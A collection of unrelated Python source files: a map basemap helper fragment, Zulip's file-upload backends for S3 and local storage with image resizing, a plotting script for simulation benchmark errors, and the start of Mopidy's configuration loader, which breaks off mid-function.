            return basemap
    return ''
def get_basemap(basemap):
    """Resolve a custom basemap dict to its style URL; non-dict inputs resolve to ''."""
    if not isinstance(basemap, dict):
        return ''
    token = get_token(basemap)
    if 'style' not in basemap:
        raise ValueError('If basemap is a dict, it must have a `style` key')
    style = basemap.get('style')
    if not token and style.startswith('mapbox://'):
        # A Mapbox style URL normally requires an access token.
        warn('A Mapbox style usually needs a token')
    return style
| |
from typing import Any, Dict, Mapping, Optional, Tuple, Text
from django.utils.translation import ugettext as _
from django.conf import settings
from django.template.defaultfilters import slugify
from django.core.files import File
from django.http import HttpRequest
from django.db.models import Sum
from jinja2 import Markup as mark_safe
import unicodedata
from zerver.lib.avatar_hash import user_avatar_path
from zerver.lib.exceptions import JsonableError, ErrorCode
from zerver.lib.str_utils import force_str, NonBinaryStr
from boto.s3.bucket import Bucket
from boto.s3.key import Key
from boto.s3.connection import S3Connection
from mimetypes import guess_type, guess_extension
from zerver.lib.str_utils import force_bytes, force_str
from zerver.models import get_user_profile_by_id, RealmEmoji
from zerver.models import Attachment
from zerver.models import Realm, RealmEmoji, UserProfile, Message
import urllib
import base64
import os
import re
from PIL import Image, ImageOps
import io
import random
import logging
DEFAULT_AVATAR_SIZE = 100
MEDIUM_AVATAR_SIZE = 500
DEFAULT_EMOJI_SIZE = 64
# Performance Note:
#
# For writing files to S3, the file could either be stored in RAM
# (if it is less than 2.5MiB or so) or an actual temporary file on disk.
#
# Because we set FILE_UPLOAD_MAX_MEMORY_SIZE to 0, only the latter case
# should occur in practice.
#
# This is great, because passing the pseudofile object that Django gives
# you to boto would be a pain.
# To come up with a s3 key we randomly generate a "directory". The
# "file name" is the original filename provided by the user run
# through a sanitization function.
# Matches the path portion of an attachment URL, tolerating the "-"/"_"/"."
# separator variants that appear in the wild.
attachment_url_re = re.compile(r'[/\-]user[\-_]uploads[/\.-].*?(?=[ )]|\Z)')

def attachment_url_to_path_id(attachment_url: Text) -> Text:
    """Strip the "/user_uploads/" prefix (and trailing dots) from an attachment URL,
    yielding the path_id used to look up the Attachment row."""
    path_id_raw = re.sub(r'[/\-]user[\-_]uploads[/\.-]', '', attachment_url)
    # Remove any extra '.' after file extension. These are probably added by the user
    # BUG FIX: re.M was previously passed positionally, where re.sub expects the
    # `count` argument (re.M == 8 silently limited replacements to 8); pass it
    # as the `flags` keyword instead.
    return re.sub(r'[.]+$', '', path_id_raw, flags=re.M)
def sanitize_name(value: NonBinaryStr) -> Text:
    """
    Sanitizes a value to be safe to store in a Linux filesystem, in
    S3, and in a URL. So unicode is allowed, but not special
    characters other than ".", "-", and "_".

    This implementation is based on django.utils.text.slugify; it is
    modified by:
    * adding '.' and '_' to the list of allowed characters.
    * preserving the case of the value.
    """
    normalized = unicodedata.normalize('NFKC', value)
    cleaned = re.sub('[^\w\s._-]', '', normalized, flags=re.U).strip()
    collapsed = re.sub('[-\s]+', '-', cleaned, flags=re.U)
    return mark_safe(collapsed)
def random_name(bytes: int=60) -> Text:
    """Return a URL-safe base64 token built from ``bytes`` bytes of OS randomness."""
    raw = os.urandom(bytes)
    return base64.urlsafe_b64encode(raw).decode('utf-8')
class BadImageError(JsonableError):
    """Raised when uploaded data cannot be decoded as an image."""
    code = ErrorCode.BAD_IMAGE
class ExceededQuotaError(JsonableError):
    """Raised when an upload would push the user past their storage quota."""
    code = ErrorCode.QUOTA_EXCEEDED
def resize_avatar(image_data: bytes, size: int=DEFAULT_AVATAR_SIZE) -> bytes:
    """Decode ``image_data``, crop/scale it to a ``size`` x ``size`` square,
    and re-encode it as PNG.

    Raises:
        BadImageError: if the bytes cannot be decoded as an image.
    """
    try:
        source = Image.open(io.BytesIO(image_data))
        # NOTE(review): Image.ANTIALIAS is an alias of LANCZOS and was removed
        # in Pillow 10 -- confirm the pinned Pillow version before upgrading.
        fitted = ImageOps.fit(source, (size, size), Image.ANTIALIAS)
    except IOError:
        raise BadImageError("Could not decode image; did you upload an image file?")
    buffer = io.BytesIO()
    fitted.save(buffer, format='png')
    return buffer.getvalue()
def resize_emoji(image_data: bytes, size: int=DEFAULT_EMOJI_SIZE) -> bytes:
    """Resize emoji image bytes to ``size`` x ``size``.

    Animated GIFs are returned unmodified (resizing would drop the animation),
    but only if they are square and no wider than ``size``.

    Raises:
        JsonableError: for animated GIFs that are non-square or too large.
        BadImageError: if the bytes cannot be decoded as an image.
    """
    try:
        im = Image.open(io.BytesIO(image_data))
        image_format = im.format
        if image_format == 'GIF' and im.is_animated:
            if im.size[0] != im.size[1]:
                raise JsonableError(
                    _("Animated emoji must have the same width and height."))
            elif im.size[0] > size:
                # NOTE(review): the message hardcodes "64px" while the check
                # uses ``size`` -- they disagree if a caller overrides size.
                raise JsonableError(
                    _("Animated emoji can't be larger than 64px in width or height."))
            else:
                return image_data
        im = ImageOps.fit(im, (size, size), Image.ANTIALIAS)
    except IOError:
        raise BadImageError("Could not decode image; did you upload an image file?")
    out = io.BytesIO()
    im.save(out, format=image_format)
    return out.getvalue()
### Common

class ZulipUploadBackend:
    """Storage interface for uploads, avatars, realm icons and custom emoji.

    Implemented below by S3UploadBackend and LocalUploadBackend.
    """
    def upload_message_image(self, uploaded_file_name, uploaded_file_size,
                             content_type, file_data, user_profile, target_realm=None):
        # type: (Text, int, Optional[Text], bytes, UserProfile, Optional[Realm]) -> Text
        """Store a message attachment and return its /user_uploads/ URL path."""
        raise NotImplementedError()

    def upload_avatar_image(self, user_file: File,
                            acting_user_profile: UserProfile,
                            target_user_profile: UserProfile) -> None:
        """Store a user's avatar (original plus resized variants)."""
        raise NotImplementedError()

    def delete_message_image(self, path_id: Text) -> bool:
        """Delete a stored attachment; return whether it existed."""
        raise NotImplementedError()

    def get_avatar_url(self, hash_key: Text, medium: bool=False) -> Text:
        raise NotImplementedError()

    def ensure_medium_avatar_image(self, user_profile: UserProfile) -> None:
        raise NotImplementedError()

    def upload_realm_icon_image(self, icon_file: File, user_profile: UserProfile) -> None:
        raise NotImplementedError()

    def get_realm_icon_url(self, realm_id: int, version: int) -> Text:
        raise NotImplementedError()

    def upload_emoji_image(self, emoji_file: File, emoji_file_name: Text, user_profile: UserProfile) -> None:
        raise NotImplementedError()

    def get_emoji_url(self, emoji_file_name: Text, realm_id: int) -> Text:
        raise NotImplementedError()
### S3

def get_bucket(conn: S3Connection, bucket_name: Text) -> Bucket:
    """Look up an S3 bucket handle without validating its existence.

    Calling get_bucket() with validate=True can apparently lead
    to expensive S3 bills:
    http://www.appneta.com/blog/s3-list-get-bucket-default/
    The benefits of validation aren't completely clear to us, and
    we want to save on our bills, so we set the validate flag to False.
    (We think setting validate to True would cause us to fail faster
    in situations where buckets don't exist, but that shouldn't be
    an issue for us.)
    """
    return conn.get_bucket(bucket_name, validate=False)
def upload_image_to_s3(
        bucket_name,
        file_name,
        content_type,
        user_profile,
        contents):
    # type: (NonBinaryStr, Text, Optional[Text], UserProfile, bytes) -> None
    """Write ``contents`` to S3 at key ``file_name``, tagging the uploading
    user and realm ids as S3 metadata."""
    conn = S3Connection(settings.S3_KEY, settings.S3_SECRET_KEY)
    bucket = get_bucket(conn, bucket_name)
    key = Key(bucket)
    key.key = file_name
    key.set_metadata("user_profile_id", str(user_profile.id))
    key.set_metadata("realm_id", str(user_profile.realm_id))

    # Only send a Content-Type header when the caller supplied one.
    if content_type is not None:
        headers = {'Content-Type': content_type}  # type: Optional[Dict[Text, Text]]
    else:
        headers = None

    key.set_contents_from_string(contents, headers=headers)  # type: ignore # https://github.com/python/typeshed/issues/1552
def get_total_uploads_size_for_user(user: UserProfile) -> int:
    """Return the combined size in bytes of all attachments owned by ``user``."""
    aggregated = Attachment.objects.filter(owner=user).aggregate(Sum('size'))
    # aggregate() yields None when the user has no uploads at all.
    return aggregated['size__sum'] or 0
def within_upload_quota(user: UserProfile, uploaded_file_size: int) -> bool:
    """Check whether storing ``uploaded_file_size`` more bytes stays within the user's quota."""
    used = get_total_uploads_size_for_user(user)
    return used + uploaded_file_size <= user.quota
def get_file_info(request: HttpRequest, user_file: File) -> Tuple[Text, int, Optional[Text]]:
    """Derive (filename, size, content_type) for an uploaded file.

    The client may pass an explicit ``?mimetype=...``; otherwise the type is
    guessed from the filename. When the client supplies the type, a matching
    extension is appended to the filename instead.
    """
    uploaded_file_name = user_file.name
    assert isinstance(uploaded_file_name, str)

    content_type = request.GET.get('mimetype')
    if content_type is None:
        guessed = guess_type(uploaded_file_name)[0]
        if guessed is not None:
            content_type = guessed
    else:
        extension = guess_extension(content_type)
        if extension is not None:
            uploaded_file_name += extension

    uploaded_file_name = urllib.parse.unquote(uploaded_file_name)
    return uploaded_file_name, user_file.size, content_type
def get_signed_upload_url(path: Text) -> Text:
    """Return a short-lived (15s) signed S3 GET URL for an authenticated upload."""
    conn = S3Connection(settings.S3_KEY, settings.S3_SECRET_KEY)
    return conn.generate_url(15, 'GET', bucket=settings.S3_AUTH_UPLOADS_BUCKET, key=path)
def get_realm_for_filename(path: Text) -> Optional[int]:
    """Return the realm id of the user who uploaded ``path``, or None if the key is missing."""
    conn = S3Connection(settings.S3_KEY, settings.S3_SECRET_KEY)
    key = get_bucket(conn, settings.S3_AUTH_UPLOADS_BUCKET).get_key(path)
    if key is None:
        # This happens if the key does not exist.
        return None
    # The uploader's id was stored as S3 metadata by upload_image_to_s3().
    return get_user_profile_by_id(key.metadata["user_profile_id"]).realm_id
class S3UploadBackend(ZulipUploadBackend):
    """Upload backend that stores files in Amazon S3 (via boto)."""

    def upload_message_image(self, uploaded_file_name, uploaded_file_size,
                             content_type, file_data, user_profile, target_realm=None):
        # type: (Text, int, Optional[Text], bytes, UserProfile, Optional[Realm]) -> Text
        """Store a message attachment under <realm_id>/<random>/<sanitized name>
        in the auth-uploads bucket, record an Attachment row, and return the
        corresponding /user_uploads/ URL path."""
        bucket_name = settings.S3_AUTH_UPLOADS_BUCKET
        if target_realm is None:
            target_realm = user_profile.realm
        s3_file_name = "/".join([
            str(target_realm.id),
            random_name(18),
            sanitize_name(uploaded_file_name)
        ])
        url = "/user_uploads/%s" % (s3_file_name,)

        upload_image_to_s3(
            bucket_name,
            s3_file_name,
            content_type,
            user_profile,
            file_data
        )

        create_attachment(uploaded_file_name, s3_file_name, user_profile, uploaded_file_size)
        return url

    def delete_message_image(self, path_id: Text) -> bool:
        """Delete the S3 key for ``path_id``; return False if it was already gone."""
        conn = S3Connection(settings.S3_KEY, settings.S3_SECRET_KEY)
        bucket = get_bucket(conn, settings.S3_AUTH_UPLOADS_BUCKET)

        # check if file exists
        key = bucket.get_key(path_id)
        if key is not None:
            bucket.delete_key(key)
            return True

        file_name = path_id.split("/")[-1]
        logging.warning("%s does not exist. Its entry in the database will be removed." % (file_name,))
        return False

    def upload_avatar_image(self, user_file: File,
                            acting_user_profile: UserProfile,
                            target_user_profile: UserProfile) -> None:
        """Store an avatar in three variants: original, medium (500px) and standard size."""
        content_type = guess_type(user_file.name)[0]
        bucket_name = settings.S3_AVATAR_BUCKET
        s3_file_name = user_avatar_path(target_user_profile)

        image_data = user_file.read()
        upload_image_to_s3(
            bucket_name,
            s3_file_name + ".original",
            content_type,
            target_user_profile,
            image_data,
        )

        # custom 500px wide version
        resized_medium = resize_avatar(image_data, MEDIUM_AVATAR_SIZE)
        upload_image_to_s3(
            bucket_name,
            s3_file_name + "-medium.png",
            "image/png",
            target_user_profile,
            resized_medium
        )

        resized_data = resize_avatar(image_data)
        upload_image_to_s3(
            bucket_name,
            s3_file_name,
            'image/png',
            target_user_profile,
            resized_data,
        )
        # See avatar_url in avatar.py for URL. (That code also handles the case
        # that users use gravatar.)

    def get_avatar_url(self, hash_key: Text, medium: bool=False) -> Text:
        """Build the public S3 URL for an avatar (medium variant when requested)."""
        bucket = settings.S3_AVATAR_BUCKET
        medium_suffix = "-medium.png" if medium else ""
        # ?x=x allows templates to append additional parameters with &s
        return u"https://%s.s3.amazonaws.com/%s%s?x=x" % (bucket, hash_key, medium_suffix)

    def upload_realm_icon_image(self, icon_file: File, user_profile: UserProfile) -> None:
        """Store a realm icon (original plus resized PNG) under <realm_id>/realm/icon."""
        content_type = guess_type(icon_file.name)[0]
        bucket_name = settings.S3_AVATAR_BUCKET
        s3_file_name = os.path.join(str(user_profile.realm.id), 'realm', 'icon')

        image_data = icon_file.read()
        upload_image_to_s3(
            bucket_name,
            s3_file_name + ".original",
            content_type,
            user_profile,
            image_data,
        )

        resized_data = resize_avatar(image_data)
        upload_image_to_s3(
            bucket_name,
            s3_file_name + ".png",
            'image/png',
            user_profile,
            resized_data,
        )
        # See avatar_url in avatar.py for URL. (That code also handles the case
        # that users use gravatar.)

    def get_realm_icon_url(self, realm_id: int, version: int) -> Text:
        """Build the public S3 URL for a realm icon, cache-busted by ``version``."""
        bucket = settings.S3_AVATAR_BUCKET
        # ?x=x allows templates to append additional parameters with &s
        return u"https://%s.s3.amazonaws.com/%s/realm/icon.png?version=%s" % (bucket, realm_id, version)

    def ensure_medium_avatar_image(self, user_profile: UserProfile) -> None:
        """Regenerate the medium (500px) avatar from the stored S3 image."""
        file_path = user_avatar_path(user_profile)
        s3_file_name = file_path

        bucket_name = settings.S3_AVATAR_BUCKET
        conn = S3Connection(settings.S3_KEY, settings.S3_SECRET_KEY)
        bucket = get_bucket(conn, bucket_name)
        # NOTE(review): this reads the key without a ".original" suffix (the
        # already-resized avatar), unlike LocalUploadBackend which resizes from
        # the original -- confirm which source is intended.
        key = bucket.get_key(file_path)
        image_data = force_bytes(key.get_contents_as_string())

        resized_medium = resize_avatar(image_data, MEDIUM_AVATAR_SIZE)
        upload_image_to_s3(
            bucket_name,
            s3_file_name + "-medium.png",
            "image/png",
            user_profile,
            resized_medium
        )

    def upload_emoji_image(self, emoji_file: File, emoji_file_name: Text,
                           user_profile: UserProfile) -> None:
        """Store a custom emoji (original and resized copy) in the avatar bucket."""
        content_type = guess_type(emoji_file.name)[0]
        bucket_name = settings.S3_AVATAR_BUCKET
        emoji_path = RealmEmoji.PATH_ID_TEMPLATE.format(
            realm_id=user_profile.realm_id,
            emoji_file_name=emoji_file_name
        )

        image_data = emoji_file.read()
        resized_image_data = resize_emoji(image_data)
        upload_image_to_s3(
            bucket_name,
            ".".join((emoji_path, "original")),
            content_type,
            user_profile,
            image_data,
        )
        upload_image_to_s3(
            bucket_name,
            emoji_path,
            content_type,
            user_profile,
            resized_image_data,
        )

    def get_emoji_url(self, emoji_file_name: Text, realm_id: int) -> Text:
        """Build the public S3 URL for a custom emoji."""
        bucket = settings.S3_AVATAR_BUCKET
        emoji_path = RealmEmoji.PATH_ID_TEMPLATE.format(realm_id=realm_id,
                                                        emoji_file_name=emoji_file_name)
        return u"https://%s.s3.amazonaws.com/%s" % (bucket, emoji_path)
### Local

def write_local_file(type: Text, path: Text, file_data: bytes) -> None:
    """Write ``file_data`` under LOCAL_UPLOADS_DIR/<type>/<path>, creating parent dirs."""
    destination = os.path.join(settings.LOCAL_UPLOADS_DIR, type, path)
    os.makedirs(os.path.dirname(destination), exist_ok=True)
    with open(destination, 'wb') as output:
        output.write(file_data)
def get_local_file_path(path_id: Text) -> Optional[Text]:
    """Return the absolute on-disk path for ``path_id`` if the file exists, else None."""
    candidate = os.path.join(settings.LOCAL_UPLOADS_DIR, 'files', path_id)
    return candidate if os.path.isfile(candidate) else None
class LocalUploadBackend(ZulipUploadBackend):
    """Upload backend that stores files on local disk under LOCAL_UPLOADS_DIR."""

    def upload_message_image(self, uploaded_file_name, uploaded_file_size,
                             content_type, file_data, user_profile, target_realm=None):
        # type: (Text, int, Optional[Text], bytes, UserProfile, Optional[Realm]) -> Text
        """Write a message attachment under files/ and record an Attachment row."""
        # Split into 256 subdirectories to prevent directories from getting too big
        path = "/".join([
            str(user_profile.realm_id),
            format(random.randint(0, 255), 'x'),
            random_name(18),
            sanitize_name(uploaded_file_name)
        ])

        write_local_file('files', path, file_data)
        create_attachment(uploaded_file_name, path, user_profile, uploaded_file_size)
        return '/user_uploads/' + path

    def delete_message_image(self, path_id: Text) -> bool:
        """Remove the local file for ``path_id``; return False if it was already gone."""
        file_path = os.path.join(settings.LOCAL_UPLOADS_DIR, 'files', path_id)
        if os.path.isfile(file_path):
            # This removes the file but the empty folders still remain.
            os.remove(file_path)
            return True

        file_name = path_id.split("/")[-1]
        logging.warning("%s does not exist. Its entry in the database will be removed." % (file_name,))
        return False

    def upload_avatar_image(self, user_file: File,
                            acting_user_profile: UserProfile,
                            target_user_profile: UserProfile) -> None:
        """Write an avatar in three variants: original, standard size, and medium (500px)."""
        file_path = user_avatar_path(target_user_profile)

        image_data = user_file.read()
        write_local_file('avatars', file_path + '.original', image_data)

        resized_data = resize_avatar(image_data)
        write_local_file('avatars', file_path + '.png', resized_data)

        resized_medium = resize_avatar(image_data, MEDIUM_AVATAR_SIZE)
        write_local_file('avatars', file_path + '-medium.png', resized_medium)

    def get_avatar_url(self, hash_key: Text, medium: bool=False) -> Text:
        """Build the local URL for an avatar (medium variant when requested)."""
        # ?x=x allows templates to append additional parameters with &s
        medium_suffix = "-medium" if medium else ""
        return u"/user_avatars/%s%s.png?x=x" % (hash_key, medium_suffix)

    def upload_realm_icon_image(self, icon_file: File, user_profile: UserProfile) -> None:
        """Write a realm icon (original plus resized PNG) under avatars/<realm>/realm/."""
        upload_path = os.path.join('avatars', str(user_profile.realm.id), 'realm')
        image_data = icon_file.read()
        write_local_file(
            upload_path,
            'icon.original',
            image_data)

        resized_data = resize_avatar(image_data)
        write_local_file(upload_path, 'icon.png', resized_data)

    def get_realm_icon_url(self, realm_id: int, version: int) -> Text:
        """Build the local URL for a realm icon, cache-busted by ``version``."""
        # ?x=x allows templates to append additional parameters with &s
        return u"/user_avatars/%s/realm/icon.png?version=%s" % (realm_id, version)

    def ensure_medium_avatar_image(self, user_profile: UserProfile) -> None:
        """Create the medium (500px) avatar from the stored original, if not present yet."""
        file_path = user_avatar_path(user_profile)

        output_path = os.path.join(settings.LOCAL_UPLOADS_DIR, "avatars", file_path + "-medium.png")
        if os.path.isfile(output_path):
            return

        image_path = os.path.join(settings.LOCAL_UPLOADS_DIR, "avatars", file_path + ".original")
        image_data = open(image_path, "rb").read()
        resized_medium = resize_avatar(image_data, MEDIUM_AVATAR_SIZE)
        write_local_file('avatars', file_path + '-medium.png', resized_medium)

    def upload_emoji_image(self, emoji_file: File, emoji_file_name: Text,
                           user_profile: UserProfile) -> None:
        """Write a custom emoji (original and resized copy) under avatars/."""
        emoji_path = RealmEmoji.PATH_ID_TEMPLATE.format(
            realm_id= user_profile.realm_id,
            emoji_file_name=emoji_file_name
        )

        image_data = emoji_file.read()
        resized_image_data = resize_emoji(image_data)
        write_local_file(
            'avatars',
            ".".join((emoji_path, "original")),
            image_data)
        write_local_file(
            'avatars',
            emoji_path,
            resized_image_data)

    def get_emoji_url(self, emoji_file_name: Text, realm_id: int) -> Text:
        """Build the local URL for a custom emoji."""
        return os.path.join(
            u"/user_avatars",
            RealmEmoji.PATH_ID_TEMPLATE.format(realm_id=realm_id, emoji_file_name=emoji_file_name))
# Common and wrappers

# Select the storage backend once at import time: local disk when
# LOCAL_UPLOADS_DIR is configured, otherwise S3.
if settings.LOCAL_UPLOADS_DIR is not None:
    upload_backend = LocalUploadBackend() # type: ZulipUploadBackend
else:
    upload_backend = S3UploadBackend()
def delete_message_image(path_id: Text) -> bool:
    """Delete a stored attachment via the active storage backend."""
    return upload_backend.delete_message_image(path_id)
def upload_avatar_image(user_file: File, acting_user_profile: UserProfile,
                        target_user_profile: UserProfile) -> None:
    """Store an avatar via the active storage backend."""
    upload_backend.upload_avatar_image(user_file, acting_user_profile, target_user_profile)
def upload_icon_image(user_file: File, user_profile: UserProfile) -> None:
    """Store a realm icon via the active storage backend."""
    upload_backend.upload_realm_icon_image(user_file, user_profile)
def upload_emoji_image(emoji_file: File, emoji_file_name: Text, user_profile: UserProfile) -> None:
    """Store a custom emoji via the active storage backend."""
    upload_backend.upload_emoji_image(emoji_file, emoji_file_name, user_profile)
def upload_message_image(uploaded_file_name, uploaded_file_size,
                         content_type, file_data, user_profile, target_realm=None):
    # type: (Text, int, Optional[Text], bytes, UserProfile, Optional[Realm]) -> Text
    """Store a message attachment via the active storage backend and return its URL path."""
    return upload_backend.upload_message_image(uploaded_file_name, uploaded_file_size,
                                               content_type, file_data, user_profile,
                                               target_realm=target_realm)
def claim_attachment(user_profile: UserProfile,
                     path_id: Text,
                     message: Message,
                     is_message_realm_public: bool) -> None:
    """Link the Attachment identified by ``path_id`` to ``message``.

    The is_realm_public flag is only ever widened: once any linking message is
    realm-public, the attachment stays realm-public.
    """
    attachment = Attachment.objects.get(path_id=path_id)
    attachment.messages.add(message)
    attachment.is_realm_public = attachment.is_realm_public or is_message_realm_public
    attachment.save()
def create_attachment(file_name: Text, path_id: Text, user_profile: UserProfile,
                      file_size: int) -> bool:
    """Record a freshly stored upload in the Attachment table; always returns True."""
    Attachment.objects.create(file_name=file_name, path_id=path_id, owner=user_profile,
                              realm=user_profile.realm, size=file_size)
    return True
def upload_message_image_from_request(request: HttpRequest, user_file: File,
                                      user_profile: UserProfile) -> Text:
    """Derive file metadata from the HTTP request, then store the attachment."""
    uploaded_file_name, uploaded_file_size, content_type = get_file_info(request, user_file)
    return upload_message_image(uploaded_file_name, uploaded_file_size,
                                content_type, user_file.read(), user_profile)
| |
#! /usr/bin/env python3
import copy
import math
import sys

from mule.plotting.Plotting import *
from mule.postprocessing.JobsData import *
from mule.postprocessing.JobsDataConsolidate import *
sys.path.append('../')
import pretty_plotting as pp
sys.path.pop()
#mule_plotting_usetex(False)
# Group jobs by time-stepping method and REXI coefficient id, so each group
# becomes one line in the plots below.
groups = ['runtime.timestepping_method', 'runtime.rexi_files_coefficients.0.unique_id_string']

# Error norms (vs. reference solution) to generate one set of plots for each.
tagnames_y = [
    'sphere_data_diff_prog_phi_pert.res_norm_l1',
    'sphere_data_diff_prog_phi_pert.res_norm_l2',
    'sphere_data_diff_prog_phi_pert.res_norm_linf',
]

j = JobsData('./job_bench_*', verbosity=0)

c = JobsDataConsolidate(j)
print("")
print("Groups:")
job_groups = c.create_groups(groups)
for key, g in job_groups.items():
    print(key)

for tagname_y in tagnames_y:
    params = []
    # Plot 1: error vs. timestep size.
    params += [
        {
            'tagname_x': 'runtime.timestep_size',
            'xlabel': "Timestep size (seconds)",
            'ylabel': pp.latex_pretty_names[tagname_y],
            'title': 'Timestep size vs. error',
            'xscale': 'log',
            'yscale': 'log',
        },
    ]
    # Plot 2: error vs. wallclock time.
    params += [
        {
            'tagname_x': 'output.simulation_benchmark_timings.main_timestepping',
            'xlabel': "Wallclock time (seconds)",
            'ylabel': pp.latex_pretty_names[tagname_y],
            'title': 'Wallclock time vs. error',
            'xscale': 'log',
            'yscale': 'log',
        },
    ]

    for param in params:
        tagname_x = param['tagname_x']
        xlabel = param['xlabel']
        ylabel = param['ylabel']
        title = param['title']
        xscale = param['xscale']
        yscale = param['yscale']

        print("*"*80)
        print("Processing tag "+tagname_x)
        print("*"*80)

        if True:
            """
            Plotting format
            """

            # Filter out errors beyond this value!
            def data_filter(x, y, jobdata):
                # Returning True drops the data point from the plot.
                if y == None:
                    return True

                x = float(x)
                y = float(y)

                if math.isnan(y):
                    return True

                if 'prog_phi' in tagname_y:
                    # NOTE(review): this early return disables the threshold
                    # checks below for all current tags (they all contain
                    # 'prog_phi') -- confirm the dead code is intentional.
                    return False
                    if 'l1' in tagname_y:
                        if y > 1e5:
                            print("Sorting out L1 data "+str(y))
                            return True
                    elif 'l2' in tagname_y:
                        if y > 1e5:
                            print("Sorting out L2 data "+str(y))
                            return True
                    elif 'linf' in tagname_y:
                        if y > 1e6:
                            print("Sorting out Linf data "+str(y))
                            return True
                    else:
                        raise Exception("Unknown y tag "+tagname_y)
                else:
                    print("TODO")

                return False

            d = JobsData_GroupsPlottingScattered(
                job_groups,
                tagname_x,
                tagname_y,
                data_filter = data_filter
            )

            fileid = "output_plotting_"+tagname_x.replace('.', '-').replace('_', '-')+"_vs_"+tagname_y.replace('.', '-').replace('_', '-')

            if True:
                #
                # Proper naming and sorting of each label
                #

                # new data dictionary
                data_new = {}
                for key, data in d.data.items():
                    print("Processing "+key)
                    print(" + x_values: ", str(data['x_values']))
                    print(" + y_values: ", str(data['y_values']))

                    if len(data['x_values']) == 0:
                        print(" + skipping "+key+": No value available")
                        continue

                    if '_exp_' in key:
                        if len(data['x_values']) <= 1:
                            print(" + skipping "+key+": Only one value available")
                            continue

                    s = key.split('__')

                    # generate nice tex label
                    if len(s) == 1:
                        data['label'] = pp.get_pretty_name(s[0])
                    else:
                        data['label'] = pp.get_pretty_name(s[0])+" "+s[1].replace("_", " ")

                    # Prefix a sort key so lines appear in a stable, pretty order.
                    key_new = pp.get_pretty_name_order(s[0])+'_'+key

                    # copy data
                    data_new[key_new] = copy.copy(data)

                # Copy back new data table
                d.data = data_new

            p = Plotting_ScatteredData()

            # Axis tick formatting hook, applied inside the plotting helper.
            def fun(p):
                from matplotlib import ticker
                from matplotlib.ticker import FormatStrFormatter

                plt.tick_params(axis='x', which='minor')
                p.ax.xaxis.set_minor_formatter(FormatStrFormatter("%.0f"))
                p.ax.xaxis.set_major_formatter(FormatStrFormatter("%.0f"))

                p.ax.xaxis.set_minor_locator(ticker.LogLocator(subs=[1.5, 2.0, 3.0, 5.0]))

                for tick in p.ax.xaxis.get_minor_ticks():
                    tick.label.set_fontsize(8)

                plt.tick_params(axis='y', which='minor')
                p.ax.yaxis.set_minor_formatter(FormatStrFormatter("%.1e"))
                p.ax.yaxis.set_major_formatter(FormatStrFormatter("%.1e"))

                p.ax.yaxis.set_minor_locator(ticker.LogLocator(subs=[1.5, 2.0, 3.0, 5.0]))

                for tick in p.ax.yaxis.get_minor_ticks():
                    tick.label.set_fontsize(6)

            for key, data in d.get_data_float().items():
                print(key, data)

            annotate_text_template = "{:.1f} / {:.3f}"
            p.plot(
                data_plotting = d.get_data_float(),
                xlabel = xlabel,
                ylabel = ylabel,
                title = title,
                xscale = xscale,
                yscale = yscale,
                #annotate = True,
                #annotate_each_nth_value = 3,
                #annotate_fontsize = 6,
                #annotate_text_template = annotate_text_template,
                legend_fontsize = 6,
                grid = True,
                outfile = fileid+".pdf",
                lambda_fun = fun,
            )

            print("Data plotting:")
            d.print()
            d.write(fileid+".csv")

print("Info:")
print(" NaN: Errors in simulations")
print(" None: No data available")
| |
from __future__ import unicode_literals
import ConfigParser as configparser
import io
import itertools
import logging
import os.path
import re
from mopidy.config import keyring
from mopidy.config.schemas import * # noqa
from mopidy.config.types import * # noqa
from mopidy.utils import path, versioning
logger = logging.getLogger(__name__)

# Schema for the [logging] config section.
_logging_schema = ConfigSchema('logging')
_logging_schema['color'] = Boolean()
_logging_schema['console_format'] = String()
_logging_schema['debug_format'] = String()
_logging_schema['debug_file'] = Path()
_logging_schema['config_file'] = Path(optional=True)

# [loglevels] maps arbitrary logger names to levels, so it gets its own schema type.
_loglevels_schema = LogLevelConfigSchema('loglevels')

# Schema for the [audio] config section.
_audio_schema = ConfigSchema('audio')
_audio_schema['mixer'] = String()
_audio_schema['mixer_track'] = Deprecated()
_audio_schema['mixer_volume'] = Integer(optional=True, minimum=0, maximum=100)
_audio_schema['output'] = String()
_audio_schema['visualizer'] = String(optional=True)

# Schema for the [proxy] config section.
_proxy_schema = ConfigSchema('proxy')
_proxy_schema['scheme'] = String(optional=True,
                                 choices=['http', 'https', 'socks4', 'socks5'])
_proxy_schema['hostname'] = Hostname(optional=True)
_proxy_schema['port'] = Port(optional=True)
_proxy_schema['username'] = String(optional=True)
_proxy_schema['password'] = Secret(optional=True)

# NOTE: if multiple outputs ever comes something like LogLevelConfigSchema
# _outputs_schema = config.AudioOutputConfigSchema()

# Core schemas applied to every config load; extension schemas are appended per call.
_schemas = [_logging_schema, _loglevels_schema, _audio_schema, _proxy_schema]

# Header written at the top of a freshly generated config file
# (%(versions)s is substituted in format_initial()).
_INITIAL_HELP = """
# For further information about options in this file see:
# http://docs.mopidy.com/
#
# The initial commented out values reflect the defaults as of:
# %(versions)s
#
# Available options and defaults might have changed since then,
# run `mopidy config` to see the current effective config and
# `mopidy --version` to check the current version.
"""
def read(config_file):
    """Return the raw bytes of *config_file*.

    Shared helper so core and extensions load their default configs the
    same way.
    """
    handle = io.open(config_file, 'rb')
    try:
        return handle.read()
    finally:
        handle.close()
def load(files, extensions, overrides):
    """Load and validate config from defaults, files and overrides.

    Keeps extension knowledge out of the rest of the config system:
    extension defaults and schemas are folded in here.
    """
    base_dir = os.path.dirname(__file__)
    defaults = [read(os.path.join(base_dir, 'default.conf'))]
    for extension in extensions:
        defaults.append(extension.get_default_config())
    combined_overrides = keyring.fetch() + (overrides or [])
    raw_config = _load(files, defaults, combined_overrides)
    schemas = list(_schemas)
    for extension in extensions:
        schemas.append(extension.get_config_schema())
    return _validate(raw_config, schemas)
def format(config, extensions, comments=None, display=True):
    """Serialize *config* to INI-style text, including extension schemas.

    Keeps extension knowledge out of the rest of the config system.
    """
    schemas = list(_schemas)
    for extension in extensions:
        schemas.append(extension.get_config_schema())
    return _format(config, comments or {}, schemas, display, False)
def format_initial(extensions):
    """Render a fully commented-out starter config for a fresh install.

    The output begins with a version banner (Mopidy plus each extension)
    followed by every known option, disabled, at its default value.
    """
    here = os.path.dirname(__file__)
    defaults = [read(os.path.join(here, 'default.conf'))]
    defaults.extend(ext.get_default_config() for ext in extensions)
    raw_config = _load([], defaults, [])
    schemas = _schemas[:]
    schemas.extend(ext.get_config_schema() for ext in extensions)
    config, errors = _validate(raw_config, schemas)

    versions = ['Mopidy %s' % versioning.get_version()]
    versions.extend(
        '%s %s' % (ext.dist_name, ext.version)
        for ext in sorted(extensions, key=lambda ext: ext.dist_name))
